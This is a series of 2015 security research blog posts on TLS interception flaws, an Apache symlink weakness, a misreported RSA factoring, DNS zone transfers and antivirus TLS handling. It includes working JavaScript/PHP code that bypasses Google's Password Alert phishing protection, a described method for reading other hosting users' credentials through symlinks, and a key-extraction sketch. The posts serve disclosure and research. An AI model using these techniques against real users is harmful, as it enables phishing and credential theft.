Thursday, August 13. 2015

More TLS Man-in-the-Middle failures - Adguard, Privdog again and ProtocolFilters.dll

In February the discovery of a piece of software called Superfish attracted widespread attention. Superfish caused a severe security vulnerability by intercepting HTTPS connections with a Man-in-the-Middle certificate. The certificate and the corresponding private key were shared amongst all installations.



The use of Man-in-the-Middle proxies for traffic interception is a widespread method: an application installs a root certificate into the browser and later intercepts connections by creating signed certificates for webpages on the fly. It quickly became clear that Superfish was only the tip of the iceberg. The underlying software module Komodia was used in a whole range of applications, all suffering from the same bug. Later another piece of software named Privdog was found that also intercepted HTTPS traffic, and I published a blog post explaining that it was broken in a different way: it completely failed to do any certificate verification on its connections.

In a later blogpost I analyzed several Antivirus applications that also intercept HTTPS traffic. They were not as broken as Superfish or Privdog, but all of them decreased the security of the TLS encryption in one way or another. The most severe issue was that Kaspersky was at that point still vulnerable to the FREAK bug, more than a month after it was discovered. In a comment to that blogpost I was asked about a software called Adguard. I have to apologize that it took me so long to write this up.

Different certificate, same key



The first thing I did was to install Adguard two times in different VMs and look at the root certificate that got installed into the browser. The fingerprint of the certificates was different. However a closer look revealed something interesting: The RSA modulus was the same. It turned out that Adguard created a new root certificate with a changing serial number for every installation, but it didn't generate a new key. Therefore it is vulnerable to the same attacks as Superfish.
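The comparison described above can be reproduced with a few lines of Python. This is only a minimal sketch, not the procedure actually used for the analysis: it assumes the two root certificates were exported as PEM files (the file names are hypothetical) and that the `openssl` command line tool is installed. It relies on `openssl x509 -noout -modulus`, which prints the RSA modulus as a `Modulus=<hex>` line.

```python
import subprocess


def parse_modulus(openssl_output: str) -> int:
    """Extract the modulus from the 'Modulus=<hex>' line printed by openssl."""
    for line in openssl_output.splitlines():
        if line.startswith("Modulus="):
            return int(line.split("=", 1)[1], 16)
    raise ValueError("no Modulus= line found")


def read_modulus(cert_path: str) -> int:
    """Ask openssl for the RSA modulus of a PEM certificate."""
    result = subprocess.run(
        ["openssl", "x509", "-in", cert_path, "-noout", "-modulus"],
        capture_output=True, text=True, check=True,
    )
    return parse_modulus(result.stdout)


def share_modulus(cert_a: str, cert_b: str) -> bool:
    """True if both certificates contain the same RSA modulus.

    The fingerprints can still differ, because the fingerprint covers the
    whole certificate, including the serial number.
    """
    return read_modulus(cert_a) == read_modulus(cert_b)


if __name__ == "__main__":
    # Hypothetical file names for the certificates from the two VMs.
    print(share_modulus("adguard-vm1.pem", "adguard-vm2.pem"))
```

Two certificates with different fingerprints but the same modulus are signed with the same private key, which is exactly the situation described here.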

I reported this issue to Adguard. Adguard has fixed this issue, however they still intercept HTTPS traffic.

I learned that Adguard did not always use the same key, instead it chose one out of ten different keys based on the CPU. All ten keys could easily be extracted from a file called ProtocolFilters.dll that was shipped with Adguard. Older versions of Adguard only used one key shared amongst all installations. There also was a very outdated copy of the nss library. It suffers from various vulnerabilities, however it seems they are not exploitable. The library is not used for TLS connections, its only job is to install certificates into the Firefox root store.

Meet Privdog again

The outdated nss version gave me a hint, because I had seen this before: in Privdog. I had spent some time trying to find out whether Privdog was vulnerable to known nss issues (which had the positive side effect that Filippo created proof of concept code for the BERserk vulnerability). What I didn't notice back then was the shared key issue. Privdog also used the same key amongst different installations. So it turns out Privdog was completely broken in two different ways: by sharing the private key amongst installations and by not verifying certificates.

The latest version of Privdog no longer intercepts HTTPS traffic, it works as a browser plugin now. I don't know whether this vulnerability was still present after the initial fix caused by my original blog post.

Now what is this ProtocolFilters.dll? It is a commercial software module that is supposed to be used along with a product called Netfilter SDK. I wondered where else this would be found and if we would have another widely used software module like Komodia.

ProtocolFilters.dll is mentioned a lot on the web, mostly in the context of Potentially Unwanted Applications, also called Crapware. That means software that is either preinstalled or bundled with the installers of other software, and that is often installed without the user's consent or by tricking the user into clicking some "ok" button without knowing that he or she is agreeing to install additional software. Unfortunately I was unable to get my hands on any other software using it.

Lots of "Potentially Unwanted Applications" use ProtocolFilters.dll

Software names that I found that supposedly include ProtocolFilters.dll: Coupoon, CashReminder, SavingsDownloader, Scorpion Saver, SavingsbullFilter, BRApp, NCupons, Nurjax, Couponarific, delshark, rrsavings, triosir, screentk. If anyone has any of them or any other piece of software bundling ProtocolFilters.dll I'd be interested in receiving a copy.

I'm publishing all Adguard keys and the Privdog key together with example certificates here. I also created a trivial script that can be used to extract keys from ProtocolFilters.dll (or other binary files that include TLS private keys in their binary form). It looks for anything that could be a private key by its initial bytes and then calls OpenSSL to try to decode it. If OpenSSL succeeds it will dump the key.
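For readers who want to try the idea themselves, here is a rough Python sketch of the approach described above. It is not the published script. It assumes the keys are stored as unencrypted PKCS#1 RSA private keys in DER form, which start with a SEQUENCE header (`30 82` plus a two-byte length) followed by the version INTEGER `02 01 00`. The function names are made up for this example, and the OpenSSL step assumes the `openssl` command line tool is available.

```python
import subprocess
import tempfile


def find_key_candidates(blob: bytes) -> list:
    """Return (offset, der_bytes) for everything that looks like a DER RSA key."""
    candidates = []
    pos = blob.find(b"\x30\x82")
    while pos != -1:
        header = blob[pos:pos + 7]
        # SEQUENCE with 16-bit length, then INTEGER 0 (the key version).
        if len(header) == 7 and header[4:7] == b"\x02\x01\x00":
            length = int.from_bytes(header[2:4], "big")
            end = pos + 4 + length
            if end <= len(blob):
                candidates.append((pos, blob[pos:end]))
        pos = blob.find(b"\x30\x82", pos + 1)
    return candidates


def openssl_accepts(der: bytes) -> bool:
    """Let OpenSSL decide whether a candidate really decodes as an RSA key."""
    with tempfile.NamedTemporaryFile(suffix=".der") as handle:
        handle.write(der)
        handle.flush()
        result = subprocess.run(
            ["openssl", "rsa", "-inform", "DER", "-in", handle.name, "-noout"],
            capture_output=True,
        )
    return result.returncode == 0


if __name__ == "__main__":
    with open("ProtocolFilters.dll", "rb") as dll:
        data = dll.read()
    for offset, der in find_key_candidates(data):
        if openssl_accepts(der):
            print(f"RSA private key found at offset {offset}")
```

The byte pattern produces false positives, which is why the final decision is left to OpenSSL.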

Finally an announcement for visitors of the Chaos Communication Camp: I will give a talk about TLS interception issues and the whole story of Superfish, Privdog and friends on Sunday.

Update: Due to the storm the talk was delayed. It will happen on Monday at 12:30 in Track South.

Posted by Hanno Böck in Cryptography, English, Security at 00:44

Defined tags for this entry: adguard, https, komodia, maninthemiddle, netfiltersdk, privdog, protocolfilters, security, superfish, tls, vulnerability

Tuesday, June 23. 2015

The tricky security issue with FollowSymLinks and Apache

tl;dr Most servers running a multi-user webhosting setup with Apache HTTPD probably have a security problem. Unless you're using Grsecurity there is no easy fix.

I am part of a small webhosting business that I have been running as a side project for quite a while. We offer customers user accounts on our servers running Gentoo Linux and webspace with the typical Apache/PHP/MySQL combination. We recently became aware of a security problem regarding symlinks. I wanted to share this because I was appalled that there was no obvious solution.

Apache has an option FollowSymLinks which basically does what it says. If a symlink in a webroot is accessed the webserver will follow it. In a multi-user setup this is a security problem. Here's why: If I know that another user on the same system is running a typical web application - let's say Wordpress - I can create a symlink to his config file (for Wordpress that's wp-config.php). I can't see this file with my own user account. But the webserver can see it, so I can access it with the browser over my own webpage. As I'm usually allowed to disable PHP I'm able to prevent the server from interpreting the file, so I can read the other user's database credentials. The webserver needs to be able to see all files, therefore this works. While PHP and CGI scripts usually run with user's rights (at least if the server is properly configured) the files are still read by the webserver. For this to work I need to guess the path and name of the file I want to read, but that's often trivial. In our case we have default paths in the form /home/[username]/websites/[hostname]/htdocs where webpages are located.

So the obvious solution one might think about is to disable the FollowSymLinks option and forbid users to set it themselves. However symlinks in web applications are pretty common and many will break if you do that. It's not feasible for a common webhosting server.

Apache supports another Option called SymLinksIfOwnerMatch. It's also pretty self-explanatory, it will only follow symlinks if they belong to the same user. That sounds like it solves our problem. However there are two catches: First of all the Apache documentation itself says that "this option should not be considered a security restriction". It is still vulnerable to race conditions.
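To make the race condition more concrete, here is a small Python sketch of an owner check in the spirit of SymLinksIfOwnerMatch. It is an illustration only and not how Apache implements the option; the function names are invented for this example. The check and the later file access are two separate steps, and that gap is where the race lives.

```python
import os
import stat


def symlink_owner_matches(path: str) -> bool:
    """True if path is not a symlink, or if link and target have the same owner."""
    link_info = os.lstat(path)            # metadata of the link itself
    if not stat.S_ISLNK(link_info.st_mode):
        return True                       # regular file, nothing to compare
    try:
        target_info = os.stat(path)       # follows the link to its target
    except FileNotFoundError:
        return False                      # dangling link, refuse it
    return link_info.st_uid == target_info.st_uid


def read_if_owner_matches(path: str) -> bytes:
    """Serve a file only if the owner check passes."""
    if not symlink_owner_matches(path):
        raise PermissionError(f"owner mismatch for {path}")
    # Race window: between the check above and the open() below the link
    # can be replaced with one that points to another user's file.
    with open(path, "rb") as handle:
        return handle.read()
```

An attacker who swaps the link quickly enough, often enough, will eventually win that window, which is why a check of this kind cannot be a reliable security boundary.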

But even leaving the race condition aside, it doesn't really work. Web applications using symlinks will usually try to set FollowSymLinks in their .htaccess file. An example is Drupal, which by default comes with such an .htaccess file. If you forbid users to set FollowSymLinks, the option won't just be ignored: the whole webpage won't run and will just return an error 500. What you could do is manually change the FollowSymLinks option in the .htaccess file to SymLinksIfOwnerMatch. While this may be feasible in some cases, with a lot of users you don't want to explain to all of them that whenever they install some common web application they have to manually edit a file they don't understand. (There's a bug report for Drupal asking to change FollowSymLinks to SymLinksIfOwnerMatch, but it has been ignored for several years.)

So using SymLinksIfOwnerMatch is neither secure nor really feasible. The documentation for cPanel discusses several possible solutions. The recommended solutions require proprietary modules. None of the proposed fixes work with a plain Apache setup, which I think is a pretty dismal situation. The most common web server has a severe security weakness in a very common situation and no usable solution for it.

The one solution that we chose is a feature of Grsecurity. Grsecurity is a Linux kernel patch that greatly enhances security and we've been very happy with it in the past. There are a lot of reasons to use this patch; I'm often impressed by how frequently local root exploits don't work on a Grsecurity system.

Grsecurity has an option like SymLinksIfOwnerMatch (CONFIG_GRKERNSEC_SYMLINKOWN) that operates on the kernel level. You can define a certain user group (which in our case is the "apache" group) for which this option will be enabled. For us this was the best solution, as it required very little change.

I haven't checked this, but I'm pretty sure that we are not alone with this problem. I'd guess that a lot of shared web hosting companies are vulnerable to it.

Here's the German blog post on our webpage and here's the original blogpost from an administrator at Uberspace (also German) which made us aware of this issue.

Sunday, May 17. 2015

About the supposed factoring of a 4096 bit RSA key

tl;dr The news about a broken 4096 bit RSA key is not true. It is just a faulty copy of a valid key.

Earlier today a blog post claiming the factoring of a 4096 bit RSA key was published and quickly made it to the top of Hacker News. The key in question was the PGP key of a well-known Linux kernel developer. I already commented on Hacker News why this is most likely wrong, but I thought I'd write up some more details. To understand what is going on I have to explain some background both on RSA and on PGP keyservers. This by itself is pretty interesting.

RSA public keys consist of two values called N and e. The N value, called the modulus, is the interesting one here. It is the product of two very large prime numbers. The security of RSA relies on the fact that these two numbers are secret. If an attacker were able to learn these numbers, he could use them to calculate the private key. That's the reason why RSA depends on the hardness of the factoring problem. If someone can factor N he can break RSA. For all we know today factoring is hard enough to make RSA secure (at least as long as there are no large quantum computers).

Now imagine you have two RSA keys, but they have been generated with bad random numbers. They are different, but one of their primes is the same. That means we have N1=p*q1 and N2=p*q2. In this case RSA is no longer secure, because calculating the greatest common divisor (GCD) of two large numbers can be done very fast with the euclidean algorithm, therefore one can calculate the shared prime value.
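A tiny Python example shows how little work this is. The primes here are toy values chosen for illustration; real moduli are thousands of bits long, but `math.gcd` handles those just as quickly.

```python
from math import gcd


def recover_shared_prime(n1: int, n2: int):
    """Return the common factor of two moduli, or None if they share none."""
    shared = gcd(n1, n2)
    # A result of 1 means no common factor; a result equal to a modulus
    # means the two moduli are identical (or one divides the other).
    if 1 < shared < min(n1, n2):
        return shared
    return None


if __name__ == "__main__":
    p, q1, q2 = 101, 103, 107          # toy primes, p is the shared one
    n1, n2 = p * q1, p * q2
    shared = recover_shared_prime(n1, n2)
    print(shared, n1 // shared, n2 // shared)
```

Once the shared prime is known, the other prime of each key follows from a single division, and with both primes the private key can be calculated.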

It is not only possible to break RSA keys if you have two keys with one shared factor, it is also possible to take a large set of keys and find shared factors between them. In 2012 Arjen Lenstra and his team published a paper using this attack on large scale key sets, and at the same time Nadia Heninger and a team at the University of Michigan independently performed the same attack. This uncovered a lot of vulnerable keys on embedded devices, but these were mostly SSH and TLS keys. Lenstra's team however also found two vulnerable PGP keys. For more background you can watch this 29C3 talk by Nadia Heninger, Dan Bernstein and Tanja Lange.

PGP keyservers have been around for quite some time and they have a property that makes them especially interesting for this kind of research: They usually never delete anything. You can add a key to a keyserver, but you cannot remove it, you can only mark it as invalid by revoking it. Therefore using the data from the keyservers gives you a large set of cryptographic keys.

Okay, so back to the news about the supposedly broken 4096 bit key: There is a service called Phuctor where you can upload a key and it'll check it against a set of known vulnerable moduli. This service identified the supposedly vulnerable key.

The key in question has the key id e99ef4b451221121 and belongs to the master key bda06085493bace4. Here is the vulnerable modulus:

c844a98e3372d67f 562bd881da8ea66c a71df16deab1541c e7d68f2243a37665 c3f07d3dd6e651cc d17a822db5794c54 ef31305699a6c77c 043ac87cafc022a3 0a2a717a4aa6b026 b0c1c818cfc16adb aae33c47b0803152 f7e424b784df2861 6d828561a41bdd66 bd220cb46cd288ce 65ccaf9682b20c62 5a84ef28c63e38e9 630daa872270fa15 80cb170bfc492b80 6c017661dab0e0c9 0a12f68a98a98271 82913ff626efddfb f8ae8f1d40da8d13 a90138686884bad1 9db776bb4812f7e3 b288b47114e486fa 2de43011e1d5d7ca 8daf474cb210ce96 2aafee552f192ca0 32ba2b51cfe18322 6eb21ced3b4b3c09 362b61f152d7c7e6 51e12651e915fc9f 67f39338d6d21f55 fb4e79f0b2be4d49 00d442d567bacf7b 6defcd5818b050a4 0db6eab9ad76a7f3 49196dcc5d15cc33 69e1181e03d3b24d a9cf120aa7403f40 0e7e4eca532eac24 49ea7fecc41979d0 35a8e4accea38e1b 9a33d733bea2f430 362bd36f68440ccc 4dc3a7f07b7a7c8f cdd02231f69ce357 4568f303d6eb2916 874d09f2d69e15e6 33c80b8ff4e9baa5 6ed3ace0f65afb43 60c372a6fd0d5629 fdb6e3d832ad3d33 d610b243ea22fe66 f21941071a83b252 201705ebc8e8f2a5 cc01112ac8e43428 50a637bb03e511b2 06599b9d4e8e1ebc eb1e820d569e31c5 0d9fccb16c41315f 652615a02603c69f e9ba03e78c64fecc 034aa783adea213b

In fact this modulus is easily factorable, because it can be divided by 3. However if you look at the master key bda06085493bace4 you'll find another subkey with this modulus:

c844a98e3372d67f 562bd881da8ea66c a71df16deab1541c e7d68f2243a37665 c3f07d3dd6e651cc d17a822db5794c54 ef31305699a6c77c 043ac87cafc022a3 0a2a717a4aa6b026 b0c1c818cfc16adb aae33c47b0803152 f7e424b784df2861 6d828561a41bdd66 bd220cb46cd288ce 65ccaf9682b20c62 5a84ef28c63e38e9 630daa872270fa15 80cb170bfc492b80 6c017661dab0e0c9 0a12f68a98a98271 82c37b8cca2eb4ac 1e889d1027bc1ed6 664f3877cd7052c6 db5567a3365cf7e2 c688b47114e486fa 2de43011e1d5d7ca 8daf474cb210ce96 2aafee552f192ca0 32ba2b51cfe18322 6eb21ced3b4b3c09 362b61f152d7c7e6 51e12651e915fc9f 67f39338d6d21f55 fb4e79f0b2be4d49 00d442d567bacf7b 6defcd5818b050a4 0db6eab9ad76a7f3 49196dcc5d15cc33 69e1181e03d3b24d a9cf120aa7403f40 0e7e4eca532eac24 49ea7fecc41979d0 35a8e4accea38e1b 9a33d733bea2f430 362bd36f68440ccc 4dc3a7f07b7a7c8f cdd02231f69ce357 4568f303d6eb2916 874d09f2d69e15e6 33c80b8ff4e9baa5 6ed3ace0f65afb43 60c372a6fd0d5629 fdb6e3d832ad3d33 d610b243ea22fe66 f21941071a83b252 201705ebc8e8f2a5 cc01112ac8e43428 50a637bb03e511b2 06599b9d4e8e1ebc eb1e820d569e31c5 0d9fccb16c41315f 652615a02603c69f e9ba03e78c64fecc 034aa783adea213b

You may notice that these look pretty similar. But they are not the same. The second one is the real subkey, the first one is just a copy of it with errors.
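Both observations are easy to check with a few lines of Python. The sketch below assumes the moduli are given as space-separated hex words like the dumps above; the helper names are made up for this example. It finds small prime factors by trial division and lists the positions at which two dumps differ.

```python
def modulus_from_dump(dump: str) -> int:
    """Turn a space-separated hex dump into an integer."""
    return int("".join(dump.split()), 16)


def small_prime_factors(n: int, limit: int = 1000) -> list:
    """Prime factors of n below limit; a sane RSA modulus has none."""
    factors = []
    for candidate in range(2, limit):
        # A composite divisor of n always has a smaller prime divisor of n,
        # which is already in the list, so only primes get appended.
        if n % candidate == 0 and all(candidate % f for f in factors):
            factors.append(candidate)
    return factors


def differing_words(dump_a: str, dump_b: str) -> list:
    """Indexes of the hex words in which two dumps differ."""
    words_a, words_b = dump_a.split(), dump_b.split()
    if len(words_a) != len(words_b):
        raise ValueError("dumps have different lengths")
    return [i for i, (a, b) in enumerate(zip(words_a, words_b)) if a != b]
```

Fed with the two moduli from this post, `differing_words` shows that only a short run of words in the middle differs, which fits a corrupted copy much better than an independently generated key.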

If you run a batch GCD analysis on the full PGP key server data you will find a number of such keys (Nadia Heninger has published code to do a batch GCD attack). I don't know how they appear on the key servers, I assume they are produced by network errors, harddisk failures or software bugs. It may also be that someone just created them in some experiment.
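The core idea of a batch GCD can be sketched in a few lines of Python. This is a simplified illustration and not the published code: real implementations use product and remainder trees to keep the huge multiplications manageable, while this version simply multiplies everything together, which is only practical for small key sets.

```python
from math import gcd, prod


def batch_gcd(moduli: list) -> list:
    """For every modulus, return its GCD with the product of all the others."""
    product = prod(moduli)
    results = []
    for n in moduli:
        # (product mod n^2) / n equals (product / n) mod n, so this is the
        # GCD of n with the product of all other moduli.
        results.append(gcd(n, (product % (n * n)) // n))
    return results


if __name__ == "__main__":
    keys = [101 * 103, 101 * 107, 109 * 113]   # toy moduli
    print(batch_gcd(keys))
```

A result of 1 means the key shares nothing with the rest of the set. Anything larger is a factor, and a corrupted modulus with many small factors tends to show up here as well.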

The important thing is: Anyone can generate a subkey for any PGP key and upload it to a key server. That's just the way the key servers work. They don't check keys in any way. However these keys should pose no threat to anyone. The only case where this could matter would be a broken implementation of the OpenPGP key protocol that does not check if subkeys really belong to a master key.

However you won't be able to easily import such a key into your local GnuPG installation. If you try to fetch this faulty sub key from a key server GnuPG will just refuse to import it. The reason is that every sub key has a signature that proves that it belongs to a certain master key. For those faulty keys this signature is obviously wrong.

Now here's my personal tie in to this story: Last year I started a project to analyze the data on the PGP key servers. And at some point I thought I had found a large number of vulnerable PGP keys – including the key in question here. In a rush I wrote a mail to all people affected. Only later I found out that something was not right and I wrote to all affected people again apologizing. Most of the keys I thought I had found were just faulty keys on the key servers.

The code I used to parse the PGP key server data is public, I also wrote a background paper and did a talk at the BsidesHN conference.

Posted by Hanno Böck in Code, Cryptography, English, Linux at 22:46

Saturday, May 2. 2015

Even more bypasses of Google Password Alert



A few days ago Google released a Chrome extension that emits a warning if a user types in his Google account password on a foreign webpage. This is meant as a protection against phishing pages. Code is on Github and the extension can be installed through Google's Chrome Web Store.

When I first heard about this I already thought that there are probably multiple ways to bypass that protection with some Javascript trickery. It seems I was right. Shortly after the extension was released security researcher Paul Moore published a way to bypass the protection by preventing the popup from being opened. This was fixed in version 1.4.

At that point I started looking into it myself. Password Alert tries to record every keystroke from the user and checks if that matches the password (it doesn't store the password, only a hash). My first thought was to simulate keystrokes via Javascript. I have to say that my Javascript knowledge is close to nonexistent, but I can use Google and read Stackoverflow threads, so I came up with this:

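<script>
// Fire an extra, synthetic keypress for every real one to confuse the extension.
function simkey(e) {
  // The synthetic event presumably arrives with which == 0, so this guard
  // keeps it from triggering itself again.
  if (e.which==0) return;
  var ev=document.createEvent("KeyboardEvent");
  ev.initKeyboardEvent("keypress", true, true, window, 0, 0, 0, 0, 0, 0);
  document.getElementById("pw").dispatchEvent(ev);
}
</script>
<form action="" method="POST">
<input type="password" id="pw" name="pw" onkeypress="simkey(event);">
<input type="submit">
</form>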

For every key a user presses this generates a Javascript KeyboardEvent. This is enough to confuse the extension. I reported this to the Google Security Team and Andrew Hintz. Literally minutes before I sent the mail a change was committed that did some sanity checks on the events and thus prevented my bypass from working (it checks the charcode and it seems there is no way in webkit to generate a KeyboardEvent with a valid charcode).

While I did that Paul Moore also created another bypass which relies on page reloads. A new version 1.6 was released fixing both my and Moore's bypass.

I gave it another try and after a couple of failures I came up with a method that still works. The extension will only store keystrokes entered on one page. So what I did is that on every keystroke I create a popup (with the already typed password still in the form field) and close the current window. The closing doesn't always work, I'm not sure why that's the case, this can probably be improved somehow. There's also some flickering in the tab bar. The password is passed via URL, this could also happen otherwise (converting that from GET to POST variable is left as an exercise to the reader). I'm also using PHP here to insert the variable into the form, this could be done in pure Javascript. Here's the code, still working with the latest version:

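<script>
// On every keystroke, open the page again in a new window with the text typed
// so far and close the current one, so no single page sees the whole password.
function rlt() {
  window.open("https://test.hboeck.de/pw2/?val="+encodeURIComponent(document.getElementById("pw").value));
  self.close();
}
</script>
<form action="." method="POST">
<input type="text" name="pw" id="pw" onkeyup="rlt();" onfocus="this.value=this.value;" value="<?php
// Prefill the field with the characters typed so far.
if (isset($_GET['val'])) echo htmlspecialchars($_GET['val']);
?>">
<input type="submit">
</form>
<script>
// Put the cursor back into the field after each reload.
document.getElementById("pw").focus();
</script>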

Honestly I have a lot of doubts if this whole approach is a good idea. There are just too many ways how this can be bypassed. I know that passwords and phishing are a big problem, I just doubt this is the right approach to tackle it.

One more thing: When I first tested this extension I was confused, because it didn't seem to work. What I didn't know is that this purely relies on keystrokes. That means when you copy-and-paste your password (e. g. from some textfile in a crypto container) then the extension will provide you no protection. At least to me this was very unexpected behaviour.
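To see why a purely keystroke-based check misses pasted passwords, consider this simplified Python model. It is an assumption-laden sketch and not the extension's actual code: the class name, the salt and the use of SHA-256 are invented for illustration. The only properties taken from the description above are that keystrokes are recorded and compared against a stored hash.

```python
import hashlib
from collections import deque


def salted_hash(text: str, salt: bytes) -> str:
    return hashlib.sha256(salt + text.encode("utf-8")).hexdigest()


class KeystrokeWatcher:
    """Keeps the most recent keystrokes and compares their hash to a stored one."""

    def __init__(self, password: str, salt: bytes = b"demo-salt"):
        self._salt = salt
        self._expected = salted_hash(password, salt)   # only the hash is kept
        self._recent = deque(maxlen=len(password))

    def on_keypress(self, char: str) -> bool:
        """Called for every key event; True means the password was just typed."""
        self._recent.append(char)
        return salted_hash("".join(self._recent), self._salt) == self._expected

    def on_paste(self, text: str) -> bool:
        """A paste generates no key events, so this model never sees the text."""
        return False


if __name__ == "__main__":
    watcher = KeystrokeWatcher("hunter2")
    print([watcher.on_keypress(c) for c in "xxhunter2"][-1])   # typed
    print(KeystrokeWatcher("hunter2").on_paste("hunter2"))     # pasted
```

Anything that changes which key events a page delivers, or avoids key events altogether, falls outside what such a design can detect.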

Posted by Hanno Böck in English, Security at 23:58

Defined tags for this entry: bypass, google, javascript, password, passwordalert, security, vulnerability

DNS AXFR scan data

I was recently made aware that many authoritative nameservers answer AXFR requests. AXFR is a feature of the Domain Name System (DNS) that allows querying complete zones from a name server. That means one can find out all subdomains for a given domain.

If you want to see how this looks Verizon kindly provides you a DNS server that will answer with a very large zone to AXFR requests:

dig axfr verizonwireless.com @ns-scrm.verizonwireless.com

This by itself is not a security issue. It can however become a problem if people consider some of their subdomains / URLs secret. While checking this issue I found one example where such a subdomain contained a logging interface that exposed data that was certainly not meant to be public. However it is a bad idea in general to have "secret" subdomains, because there is no way to keep them really secret. DNS itself is not encrypted, therefore by sniffing your traffic it is always possible to see your "secret" subdomains.

AXFR is usually meant to be used between trusting name servers and requests by public IPs should not be answered. While it is in theory possible that someone considers publicly available AXFR a desired feature I assume in the vast majority these are just misconfigurations and were never intended to be public. I contacted a number of these and when they answered none of them claimed that this was an intended configuration. I'd generally say that it's wise to disable services you don't need. Recently US-CERT has issued an advisory about this issue.

I have made a scan of the Alexa top 1 million web pages and checked if their DNS server answers to AXFR requests. The University of Michigan has a project to collect data from Internet scans and I submitted my scan results to them. So you're welcome to download and analyze the data.
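A check of this kind can be sketched with nothing but the Python standard library. The code below is not the scanner used for this data set; it is a minimal illustration that builds an AXFR question (query type 252) and sends it over TCP, where every DNS message is prefixed with a two-byte length. It only looks at the header of the first response and treats "no error and at least one answer record" as a sign that the transfer was granted, which is a simplifying assumption.

```python
import socket
import struct

AXFR = 252      # query type for a zone transfer
CLASS_IN = 1    # Internet class


def build_axfr_query(zone: str, query_id: int = 0x1234) -> bytes:
    """Build a length-prefixed DNS message asking for a full zone transfer."""
    header = struct.pack("!HHHHHH", query_id, 0, 1, 0, 0, 0)   # one question
    qname = b"".join(
        bytes([len(label)]) + label.encode("ascii")
        for label in zone.rstrip(".").split(".")
    ) + b"\x00"
    message = header + qname + struct.pack("!HH", AXFR, CLASS_IN)
    return struct.pack("!H", len(message)) + message


def _recv_exact(sock: socket.socket, count: int) -> bytes:
    data = b""
    while len(data) < count:
        chunk = sock.recv(count - len(data))
        if not chunk:
            raise ConnectionError("server closed the connection")
        data += chunk
    return data


def answers_axfr(zone: str, server: str, timeout: float = 5.0) -> bool:
    """True if the server's first response looks like a granted transfer."""
    with socket.create_connection((server, 53), timeout=timeout) as sock:
        sock.sendall(build_axfr_query(zone))
        (length,) = struct.unpack("!H", _recv_exact(sock, 2))
        response = _recv_exact(sock, length)
    if len(response) < 12:
        return False
    _, flags, _, answer_count, _, _ = struct.unpack("!HHHHHH", response[:12])
    return (flags & 0x000F) == 0 and answer_count > 0
```

Servers that refuse the transfer typically answer with an error code or simply close the connection, so callers should expect `ConnectionError` and socket timeouts as well.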

Sunday, April 26. 2015

How Kaspersky makes you vulnerable to the FREAK attack and other ways Antivirus software lowers your HTTPS security



Lately a lot of attention has been paid to software like Superfish and Privdog that intercepts TLS connections to be able to manipulate HTTPS traffic. These programs had severe (technically different) vulnerabilities that allowed attacks on HTTPS connections.

What these tools do is a widespread method. They install a root certificate into the user's browser and then they perform a so-called Man in the Middle attack. They present the user a certificate generated on the fly and manage the connection to HTTPS servers themselves. Superfish and Privdog did this in an obviously wrong way: Superfish by using the same root certificate on all installations and Privdog by just accepting every invalid certificate from web pages. What about other software that also does MitM interception of HTTPS traffic?

Antivirus software intercepts your HTTPS traffic

Many Antivirus applications and other security products use similar techniques to intercept HTTPS traffic. I had a closer look at three of them: Avast, Kaspersky and ESET. Avast enables TLS interception by default. By default Kaspersky intercepts connections to certain web pages (e. g. banking), there is an option to enable interception by default. In ESET TLS interception is generally disabled by default and can be enabled with an option.

When a security product intercepts HTTPS traffic it is itself responsible for creating a TLS connection and checking the certificate of a web page. It has to do what a browser would otherwise do. There has been a lot of debate and progress in the way TLS is done in the past years. A number of vulnerabilities in TLS (among them BEAST, CRIME, Lucky Thirteen, FREAK and others) have taught us much more about how to do TLS in a secure way. Also, problems with certificate authorities that issued malicious certificates (Diginotar, Comodo, Türktrust and others) led to the development of mitigation technologies like HTTP Public Key Pinning (HPKP) and Certificate Transparency to strengthen the security of Certificate Authorities. Modern browsers protect users much better from various threats than browsers used several years ago.

You may think: "Of course security products like Antivirus applications are fully aware of these developments and do TLS and certificate validation in the best way possible. After all security is their business, so they have to get it right." Unfortunately that's only what's happening in some fantasy IT security world that only exists in the minds of people that listened to industry PR too much. The real world is a bit different: All Antivirus applications I checked lower the security of TLS connections in one way or another.

Disabling of HTTP Public Key Pinning

Each and every TLS intercepting application I tested breaks HTTP Public Key Pinning (HPKP). It is a technology that a lot of people in the IT security community are pretty excited about: It allows a web page to pin public keys of certificates in a browser. On subsequent visits the browser will only accept certificates with these keys. It is a very effective protection against malicious or hacked certificate authorities issuing rogue certificates.

Browsers made a compromise when introducing HPKP. They won't enable the feature for manually installed certificates. The reason for that is simple (although I don't like it): If they hadn't done that they would've broken all TLS interception software like these Antivirus applications. But the applications could do the HPKP checking themselves. They just don't do it.
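To make concrete what "doing the HPKP checking themselves" would involve, here is a minimal sketch. A pin is the base64-encoded SHA-256 hash of a certificate's DER-encoded SubjectPublicKeyInfo, and a connection passes if at least one key in the presented chain matches a stored pin. The byte strings below are placeholders standing in for real public keys, and the function names are made up for illustration; extracting the keys from a live certificate chain is left out.

```python
import base64
import hashlib


def pin_sha256(spki_der: bytes) -> str:
    """Return the pin value: base64 of the SHA-256 of the DER-encoded SubjectPublicKeyInfo."""
    return base64.b64encode(hashlib.sha256(spki_der).digest()).decode("ascii")


def chain_matches_pins(chain_spkis, pinned) -> bool:
    """True if at least one public key in the presented chain matches a stored pin."""
    return any(pin_sha256(spki) in pinned for spki in chain_spkis)


# Placeholder bytes standing in for real DER-encoded public keys (assumption).
site_key = b"example-site-public-key"
rogue_key = b"key-from-a-rogue-ca"

# Pins remembered from an earlier visit to the site.
stored_pins = {pin_sha256(site_key)}

print(chain_matches_pins([site_key], stored_pins))   # True
print(chain_matches_pins([rogue_key], stored_pins))  # False
```

An interception product would have to run a check like this on the certificate chain it receives from the real server, because the browser only ever sees the locally generated certificate.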

Kaspersky vulnerable to FREAK and CRIME

Having a look at Kaspersky, I saw that it is vulnerable to the FREAK attack, a vulnerability in several TLS libraries that was found recently. Even worse: It seems this issue was reported publicly in the Kaspersky forums more than a month ago and it is not fixed yet. Please remember: Kaspersky enables HTTPS interception by default for sites it considers especially sensitive, for example banking web pages. Doing that with a known security issue is extremely irresponsible.

I also found a number of other issues. ESET doesn't support TLS 1.2 and therefore uses a less secure encryption algorithm. Avast and ESET don't support OCSP stapling. Kaspersky enables the insecure TLS compression feature that will make a user vulnerable to the CRIME attack. Both Avast and Kaspersky accept nonsensical parameters for Diffie Hellman key exchanges with a size of 8 bit. Avast is especially interesting because it bundles the Google Chrome browser. It installs a browser with advanced HTTPS features and lowers its security right away.

These TLS features are all things that current versions of Chrome and Firefox get right. If you use them in combination with one of these Antivirus applications you lower the security of HTTPS connections.

